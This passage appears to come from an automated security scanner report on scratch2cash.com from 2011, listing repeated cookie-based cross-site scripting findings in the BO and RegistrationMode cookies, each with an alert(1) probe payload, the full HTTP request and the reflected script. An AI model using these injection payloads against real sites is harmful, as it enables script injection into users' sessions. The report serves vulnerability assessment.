Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 207e8"-alert(1)-"c4e2a089614 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM207e8"-alert(1)-"c4e2a089614; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM207e8"-alert(1)-"c4e2a089614; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM207e8"-alert(1)-"c4e2a089614";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.388. http://www.scratch2cash.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 574ed"-alert(1)-"572521f5df4 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM574ed"-alert(1)-"572521f5df4; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FM574ed"-alert(1)-"572521f5df4; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM574ed"-alert(1)-"572521f5df4";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.389. http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ad9"-alert(1)-"92dfafb48c7 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMe7ad9"-alert(1)-"92dfafb48c7; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe7ad9"-alert(1)-"92dfafb48c7; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe7ad9"-alert(1)-"92dfafb48c7";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.390. http://www.scratch2cash.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722d7"-alert(1)-"9aa23431ce7 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM722d7"-alert(1)-"9aa23431ce7; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FM722d7"-alert(1)-"9aa23431ce7; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM722d7"-alert(1)-"9aa23431ce7";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.391. http://www.scratch2cash.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7879"-alert(1)-"a0288f5380d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMe7879"-alert(1)-"a0288f5380d; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe7879"-alert(1)-"a0288f5380d; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe7879"-alert(1)-"a0288f5380d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.392. http://www.scratch2cash.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d82"-alert(1)-"2df883164f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMe8d82"-alert(1)-"2df883164f; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: BO=FMe8d82"-alert(1)-"2df883164f; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe8d82"-alert(1)-"2df883164f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.393. http://www.scratch2cash.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64604"-alert(1)-"493b1a09e1a was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM64604"-alert(1)-"493b1a09e1a; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM64604"-alert(1)-"493b1a09e1a; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM64604"-alert(1)-"493b1a09e1a";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.394. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbbfd"-alert(1)-"4d0f4733887 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMbbbfd"-alert(1)-"4d0f4733887; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FMbbbfd"-alert(1)-"4d0f4733887; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbbbfd"-alert(1)-"4d0f4733887";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.395. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b70"-alert(1)-"ddf84599304 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMf2b70"-alert(1)-"ddf84599304; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf2b70"-alert(1)-"ddf84599304; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf2b70"-alert(1)-"ddf84599304";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.396. http://www.scratch2cash.com/Sitemap.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Sitemap.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32f61"-alert(1)-"5c80bc1846f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM32f61"-alert(1)-"5c80bc1846f; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: BO=FM32f61"-alert(1)-"5c80bc1846f; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM32f61"-alert(1)-"5c80bc1846f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

